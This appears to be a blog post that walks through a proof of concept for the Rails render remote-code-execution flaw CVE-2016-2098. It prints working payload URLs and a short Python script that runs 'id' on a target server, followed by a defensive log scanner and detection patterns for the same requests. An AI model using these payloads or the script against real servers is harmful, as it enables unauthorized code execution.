CVE-2016-2098 Python POC
by Vince, in Blog
"Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method."
I realize that I'm not going to understand everything but at times I feel like I'm nothing more than a really determined script kiddie. That said, this seemed like something I could grasp and when I came across the vulnerable server, I found a Metasploit module for exploiting it. After reading through the Ruby, about Ruby, without having much experience with Ruby, I was none the wiser.
I looked for alternative exploit code in the various locations to get a better understanding but what I found were elaborate examples. In hindsight, I'm not sure for what. I just wanted to maybe grasp what exactly was going on without pointing Metasploit at it.
Searching a bit more, I found a smaller proof of concept and while digging through it, I could see what was happening. Basically, you have a URL:
http://victim/pages?id=something
Everything we control comes after the ?id parameter:
http://victim/pages?id=something
http://victim/pages?id[inline]=%3C%25=%20%25x(INSERT COMMAND HERE)%20%25%3E
http://victim/pages?id[inline]=%3C%25=%20%25x(id)%20%25%3E
Line one is the original request, line two is the URL-encoded exploit template (the parameter is turned into an "inline" render option holding an ERB tag, so the server evaluates it as Ruby), and line three fills that template with the "id" command.
Playing with Python, I wrote this little script to take the URL, pass "id" and parse the response so only the command output is printed instead of the whole page:
import urllib.request

# Base URL up to and including the vulnerable parameter name, e.g. http://victim/pages?id
host = input("Enter target Url eg (http://victim/pages?id) : ")
# Append the inline-render payload; the server evaluates the ERB tag and runs "id"
url = urllib.request.urlopen(host + "[inline]=%3C%25=%20%25x(id)%20%25%3E")
# urlopen returns bytes; decode before searching for the command output
html = url.read().decode("utf-8", errors="replace").splitlines()
# Only print the line carrying the "id" output, dropping the rest of the page
for line in html:
    if 'uid=' in line:
        print()
        print(line)
You can also work with this straight in the browser:
http://victim/pages?id[inline]=%3C%25=%20%25x(id)%20%25%3E
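From the defender's side, the same request shape is what you want to spot in web server logs: a query parameter name rewritten into a render-option hash key (id[inline]) and a percent-encoded ERB tag in its value. The following is an added example, not part of the original post, that scans constructed access-log lines for exactly that pattern. It decodes percent-encoding repeatedly so a doubly encoded copy of the same payload is still normalised before matching; the log lines, IP addresses and timestamps are made up for the example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access-log lines in Apache/nginx "combined" style; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2016:12:00:01 +0000] "GET /pages?id=something HTTP/1.1" 200 512
203.0.113.9 - - [10/Mar/2016:12:00:02 +0000] "GET /pages?id[inline]=%3C%25=%20%25x(id)%20%25%3E HTTP/1.1" 200 733
203.0.113.9 - - [10/Mar/2016:12:00:03 +0000] "GET /pages?id%5Binline%5D=%253C%2525%3D%2520%2525x(id)%2520%2525%253E HTTP/1.1" 200 733
198.51.100.2 - - [10/Mar/2016:12:00:04 +0000] "GET /pages?id=%3Cb%3Ehello%3C/b%3E HTTP/1.1" 200 301
"""

# Pulls the request line out of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# An ERB tag; Rails would evaluate this when it arrives as an inline render option.
ERB_TAG_RE = re.compile(r"<%=?.*?%>", re.S)


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so a double-encoded payload is compared in clear form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target):
    """Return (param_name, decoded_value, reason) findings for one request target."""
    findings = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        name_d = fully_decode(name)
        value_d = fully_decode(value)
        reasons = []
        # The parameter name was turned into a hash with the "inline" render option as key.
        if re.search(r"\[inline\]$", name_d):
            reasons.append("inline render-option key in parameter name")
        if ERB_TAG_RE.search(value_d):
            reasons.append("ERB tag in parameter value")
        # %x(...) and backticks are Ruby's shell-execution syntax.
        if "%x(" in value_d or "`" in value_d:
            reasons.append("shell-execution syntax in parameter value")
        if reasons:
            findings.append((name_d, value_d, "; ".join(reasons)))
    return findings


def scan_log(text):
    """Return (line_number, client_ip, target, findings) for each suspicious log line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = inspect_request(m.group("target"))
        if findings:
            hits.append((lineno, line.split()[0], m.group("target"), findings))
    return hits


if __name__ == "__main__":
    for lineno, ip, target, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: {target}")
        for name, value, reason in findings:
            print(f"    {name} = {value!r}  [{reason}]")
```

Run against the sample, lines 2 and 3 are reported with the decoded value <%= %x(id) %> while the plain id=something request and the harmless HTML-in-parameter request are left alone; the decode loop is what keeps the second, doubly encoded copy from looking different to the matcher. The same three checks (render-option key in a parameter name, ERB tag in a value, shell-execution syntax in a value) translate directly into a WAF or IDS rule, and on the application side the fix is not to pass user-controlled data to render at all, as the CVE text says.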